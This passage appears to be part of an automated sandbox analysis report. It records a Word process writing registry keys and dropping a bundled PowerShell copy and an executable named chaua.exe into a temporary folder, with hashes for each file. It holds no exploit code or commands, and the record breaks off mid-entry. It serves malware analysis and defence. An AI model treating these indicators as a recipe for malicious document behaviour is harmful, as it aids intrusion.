0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
25694496
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Toolbars\Settings
Microsoft Word
0101000000000000000006000000
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
C00010033001000034010000040000001E0000001E0000001E0000001E0000001E0000001E000000220000001E0000001E0000001E000000060000000600000006000000060000000600000000000000060000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000C00000002000000020000000200000002000000000000000000000000000000480000000600000006000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000000DC000000E25024A1100A00633090060003000A002D001600000016000000C0030000F501000004060300000000000000000000000000040087010C000600C80009000180FFFF000006000000040000000C0100000502000000000000A004020000001200000000603090000064000000000000FF0000FF000000000000FF01000000010000005C08E0100000000000010000E40400001D000100000000000000020050000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D000000000000000000000000D4944600D49446010000002F91010000080A000600000003333296040000000A050C0C0302040600000300000101010606060000000000000000000000000000000000000063631900000001000000000000000000000000000000030000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002100190000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000E01000004B0000004B0000002000640000006301190000008C0A00000000B01300004B0000004B000000640000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000002000640000006363190000008C0A00000000E01000004B0000004B0000009002000002000001010101010101000101010101010001010100010001000101010101010101000100020003010301030103000301020003010301030103010000230101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101020101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010301010101010101010101010101FFFFCFFFFFFF00008602FFFF00008602FFFF00000C00FFFF00000100FFFF00000100FFFF0000010061000000610064006D0069006E000000000000000000000087FFFF0300003E00020200000600090034000000000090009000000000000F000000FFFFFF000000000000001400140000000000000002637800C80000000000140000000000900090008000FFFF00000800FFFF00000800FFFF0B00040001002000018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E0065007700018014000B0043006F007500720069006500720020004E00650077000180140001002000018014000B0043006F007500720069006500720020004E00650077000180140009004D005300200047006F0074006800690063000180150007004D0069006E0067004C0069005500018018000600530069006D00530075006E0001801500050044006F00740075006D00018014000100200001801C0000000000
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
BackgroundOpen
0
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661506
2916
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661507
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
110
2916
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
110
700
chaua.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
EnableFileTracing
0
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
EnableConsoleTracing
0
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
FileTracingMask
4294901760
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
ConsoleTracingMask
4294901760
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
MaxFileSize
1048576
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASAPI32
FileDirectory
%windir%\tracing
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
EnableFileTracing
0
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
EnableConsoleTracing
0
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
FileTracingMask
4294901760
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
ConsoleTracingMask
4294901760
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
MaxFileSize
1048576
700
chaua.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\chaua_RASMANCS
FileDirectory
%windir%\tracing

Files activity

Executable files
13
Suspicious files
0
Text files
123
Unknown types
4

Dropped files

PID
Process
Filename
Type
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
executable
MD5: a84b6952ab6a297cce6c085fa8ab06cb
SHA256: 54e3f8199d5c749920a2826c63d7c5e7e86d94874addcfd5c9b430671031017d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\powershell_ise.exe
executable
MD5: b3cc5f3514bf58ee55153795cf183754
SHA256: f2d60c0f8688f3036bdc48c37f93b204bed596b8707a5f96c9bc69e8cb6efeab
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\pwrshsip.dll
executable
MD5: 2875b386b45b8a77e2343c5e129ae50c
SHA256: 674aa2da0f27d11fdb9ff42dcf9910dc0ed320b45e60300c07990d11ca57496f
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\powershell_ise.resources.dll
executable
MD5: c38854e25160a106d9529a360af07c2c
SHA256: 2b5340fc45974a5368205d20972807c8800d776572442c4b5a908fe8ad6f31f7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\PSEvents.dll
executable
MD5: ffb89927629178d24290e5ce8be7d636
SHA256: 3fae96220b78f67324d5eb4eeae6fb9247215d2883ec0410cbf28687e655ffb7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\powershell.exe.mui
executable
MD5: 882a2edefd4e6358570464af1832d9bc
SHA256: ee1387f37911dabaa754fd8a4406029593f0ec2385468cc5706dee04eaf07798
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\pspluginwkr.dll.mui
executable
MD5: 012bf55f300e3fec25f5034f35021fab
SHA256: 751e0d0d27bd88f64f086db693a0fc51542c933db66697cdc126a6be965fd803
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\pwrshmsg.dll.mui
executable
MD5: f9ac5e35a0e3628fd42e86278855e7ab
SHA256: 7c3213e9dfef804d64f5d4cb626edfcb0aeaf2e1213062a2dba21dbea3685ca1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe
executable
MD5: 92f44e405db16ac55d97e3bfe3b132fa
SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll
executable
MD5: 6f6f04803547149815fe3ddd80c6d412
SHA256: adb7726a22d42a886cf9175b89d70b98427ae41439e10efd10ca6dc86db6f1d8
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\pspluginwkr.dll
executable
MD5: 8f94d729912099bc0d9091e48719f845
SHA256: 203841b95008acf819b5b2ebac76ef9fce13352978a4cf2b8f2077afc03a5a1b
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\pwrshmsg.dll
executable
MD5: 32d5273292a2d21ec35c60ca6019c4ef
SHA256: 7706a3eaccf4c6931aed20cd341cf3b518deb038fb9209fb6c20499e9d0be12e
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\PSEvents.dll.mui
executable
MD5: 0a9ce34df5e64535b0b56fb21ea416f9
SHA256: 5ed162b242b653969fc5f5805d27909e1b0d86e242e553ad89be5e91261b7435
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_remote_output.help.txt
text
MD5: 843c7694acdf81c35aada01240e4d43d
SHA256: 19ed68b6696a13bfb38b01f1f8a1ac41771ea319f345d31d2cfe76ad66d33c18
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{17461A6C-4218-479D-87E8-18AA94DA498E}.tmp
––
MD5:  ––
SHA256:  ––
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\PSDiagnostics\PSDiagnostics.psm1
text
MD5: e00e79e73582dab9229da82dee52b56f
SHA256: 35278dae074b56251d34c2bd0f0168bf1591083fcc0d9ee4f6a5fd70628645c3
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\PowerShellCore.format.ps1xml
xml
MD5: 7868501b2fb334345434ee864db28b81
SHA256: bce501aad2196f4c69f8ca4517a8424aa31e2863fb42de20eba4b689d6255f75
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\types.ps1xml
xml
MD5: 2300a495192fe39d518e167dc5bae6a5
SHA256: 7ee8c9dd51818ce9c2b03442ef20594ba79e26b6b3af87fe08a4790a0c34bf7c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\TroubleshootingPack\TroubleshootingPack.format.ps1xml
text
MD5: 059b2013069e42a394db5cb551e345b5
SHA256: 6dd7dded2fd500f185b4ed8b2dcdbbec1dda0625b6ac0006f4b3e92b7365f120
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\TroubleshootingPack\TroubleshootingPack.psd1
text
MD5: 896c9f3b45f00f7efc7328b60274b322
SHA256: 5da66875cb669a50b56eed98d43f03179f8fdf3b0b9062c79da167ce522f9d5c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\BitsTransfer\en-US\about_BITS_Cmdlets.help.txt
text
MD5: beeb534db71d0cb137206cd4c2d72aeb
SHA256: 6106d0dcad89f50dcbd255b910e959924a72eabc0c63679b0ac789bb5400ec23
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\TroubleshootingPack\en-US\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll-Help.xml
xml
MD5: 58949cb3dcfd589ae34d5751ea7921bd
SHA256: 57bdfcde06ab9a0a977652761658c6434a75ca8b1b4835af2a106b4c7725c85d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\powershell.exe
––
MD5:  ––
SHA256:  ––
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\System.Management.Automation.dll-Help.xml
xml
MD5: 2170b1c7496307c0949b54a6dd6f0a54
SHA256: 1168c8dd29c79e11aaaa17362f71969e0f9c3721a1c50c9800c32333f298c2a2
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Help.format.ps1xml
xml
MD5: 915f654e42bbff58bb45e199695b9645
SHA256: f88172e876bbf54d22985a789648b393a4cf37fa5c100ef428aed21c3ffe2e41
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\AppLocker\AppLocker.psd1
text
MD5: 2b16aad4e01313f505f21af056730bfe
SHA256: d22787b0b60a2e44c3b80432321b3267f41c3f58ce7bc9080c471ef92e233918
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\FileSystem.format.ps1xml
xml
MD5: 07b1a0ee828c0aea9957165342c9b0f2
SHA256: ee7c7ea3d313f74f27ae5ec832b9214d3a2731dd62ad3621b7c290119fad56e1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\AppLocker\en-US\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll-Help.xml
xml
MD5: af07b8b898e6d6e01ec6ecad383c5cd0
SHA256: 0ae6eff718f4d81b89e1bdf9acdc7ed4daac47742abf3f0e1efd924a75a28d6b
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\getevent.types.ps1xml
xml
MD5: 8bce15f00bc8e60895ba37f6e3666145
SHA256: bd543ac559e7fee952c01b76bc0b2e2ba92b9b05fbf2b79f228b9a33aa376175
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\BitsTransfer\BitsTransfer.psd1
text
MD5: 2c0a6fcb3b6fa091a6dc2649d36249ad
SHA256: a96a2d3da8fc97138378658c8b106db6c4468f576d17878bac5a252b88a02ef7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\BitsTransfer\BitsTransfer.Format.ps1xml
xml
MD5: df8df3a9150be3b665af838a81c1adf1
SHA256: bb1694a07d73474839a1ab44de15a16681ecc69003a1c447743b4866e7c1f5ac
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Examples\profile.ps1
text
MD5: 24b26c8dd3e9507390f320bb82feacff
SHA256: c91af52ebfc73ff82aefbbbefb4bb7526466c8ab7c903beb2f6996a63a54f0b4
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\WSMan.Format.ps1xml
xml
MD5: 2a365431e43987daf2960f08a49f2679
SHA256: 7cbb42f77ca04293ecdbc69e2633b94725dd03307ca3637bd29fb2d94ed72022
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Registry.format.ps1xml
xml
MD5: ea3e8e9c9e266070d499b0e1a74a54ec
SHA256: de1626c8cd04b43ba157bdbdc548174ebb4d0ab27b0e966fb383150cc8a39f1c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\PowerShellTrace.format.ps1xml
xml
MD5: 134a65f6be32e46342b5e514937b0b49
SHA256: e0cca802af6b0081a1615a1249461bc56227a1f86e98311999a1c96e1b47c5e9
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.PowerShell.Commands.Utility.dll-Help.xml
xml
MD5: a9d465b5d2ef20ae266e70352300d640
SHA256: 9e8c2473303abf1e4410cfc9a72065f29524a04306f0dff0e44bc143e7002f34
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\~DF14A802C0B266F85B.TMP
––
MD5:  ––
SHA256:  ––
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.PowerShell.ConsoleHost.dll-Help.xml
xml
MD5: a8fc5b9411d34e7f76703299cefdc14b
SHA256: c8afa7c171b8e8c310a7eb86d27d04907ad060197e56f80e05d85c514cc03109
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.PowerShell.Security.dll-Help.xml
xml
MD5: c25f7a8e570f8dbad4c416c109877660
SHA256: f886dd98b69382259a0f63c26b565af24a9368267ef60ee16ef49b00a7a66500
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Modules\PSDiagnostics\PSDiagnostics.psd1
text
MD5: 6c7ab4f2165404cfc34a925289f03c9a
SHA256: c5a5a93cb0e2ca88d267ecd74ae10798d7a8058cf517732687e31b9b4939d612
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.Wsman.Management.dll-Help.xml
xml
MD5: 7fea934a844f8c0a7900260324115571
SHA256: 5e3f986ea9b1ffa5d4245d78b378708af82a442d455f2c575aefd6c999428e71
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.PowerShell.Commands.Management.dll-Help.xml
xml
MD5: dd69d8010bdfc984bf4afe463e0a5ce6
SHA256: 086b8c991bb8639e536e504456b24650a16b2e1a8eb7c55e7e0c92bc4fc9085c
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_WMI_Cmdlets.help.txt
text
MD5: cba26a7e65800101048204b291bccca0
SHA256: 97fc421761f23ad21f1ab0c6677e018fc8e3be94f9000f9ccb8f16afb5a53de7
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Windows_PowerShell_ISE.help.txt
text
MD5: 9733f911f9ffeabe830c78606c7595ce
SHA256: 4cc6d261a332c1bbd19d907e749ab2fe5dfc626fa3009130ad96ad7932973f44
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\default.help.txt
text
MD5: e179134ddc1c768d862464d6e4a8511f
SHA256: 13b1d2c9eb465c94197b8e9d93cf72063b083f2964f3d835d1c1f8414a21f7a1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_wildcards.help.txt
text
MD5: 9d8c038c6f4abc57a9ce890367170169
SHA256: eba0d9e613186b60ffe3194ab3dd3e9f21f859526ab682029bf1a7026926c5b1
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\Microsoft.PowerShell.Commands.Diagnostics.dll-Help.xml
xml
MD5: 0ed4fc1248791de840904a2667532ea1
SHA256: 888ba7505afa707502ed8897e7a548fe2a7ed06e0aeb9b5d0e528a201e77be4a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\ImportAllModules.psd1
text
MD5: 9e3c02c4befa85398de72b52dd39c29a
SHA256: b71e6e8b3bc606b072f7259f339710eb68bcc7f09a488b0eb9c5058afb156d4b
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Windows_PowerShell_2.0.help.txt
text
MD5: d60451979004b7b169b159fecdc81adb
SHA256: 1f075d3c6e53f72aa7a991fed26a64aafe6ba687f233bcb3a342ab4d6726431f
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_WS-Management_Cmdlets.help.txt
text
MD5: 767cd05db429f751517300fae098b1e2
SHA256: f2e579fdc195265c5b1b4523e82ca78540e136fc618ffc01db8de443bb3b296d
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_While.help.txt
text
MD5: c1492a84c53feb39651faf9c3dced879
SHA256: 74077aefd669655631d393c7d71648446bcd81fb974c96071786127cc690a4e3
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_types.ps1xml.help.txt
text
MD5: 56d4528792d5a6b440b94473ef182858
SHA256: 9bfb2a721d6eef54a9fb57c792351eee2ca7a8bf0cd0beefcf6f01ea184acc53
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_type_operators.help.txt
text
MD5: a4918d1fefcd62645a968fea60fb8a43
SHA256: 288eed9b5e01a259f546da5a44e08e53240d416587461bbc4bdd1c9092975b7a
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Switch.help.txt
text
MD5: 34647bcf99a3cda9b1420976da2193fd
SHA256: d3b4d8a1933470f997e062090a336c7d37769115e209aa27ffcd7ef1b2502f36
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_try_catch_finally.help.txt
text
MD5: f22634a9aac67ce9687113330547515a
SHA256: 92176d04ae1fdc1ba160d67e7af57065eecbf81cfdd3e499a446a0cec9ee1f86
2916
WINWORD.EXE
C:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_transactions.help.txt
text
MD5: 8615bd31d5ce19bbffc951892c0bb549
SHA256: 6fc67c20e69752bd2c729f9e63de09308811f96c7cfdbfecdad0b1c3882de269
2916
WINWORD.EXE
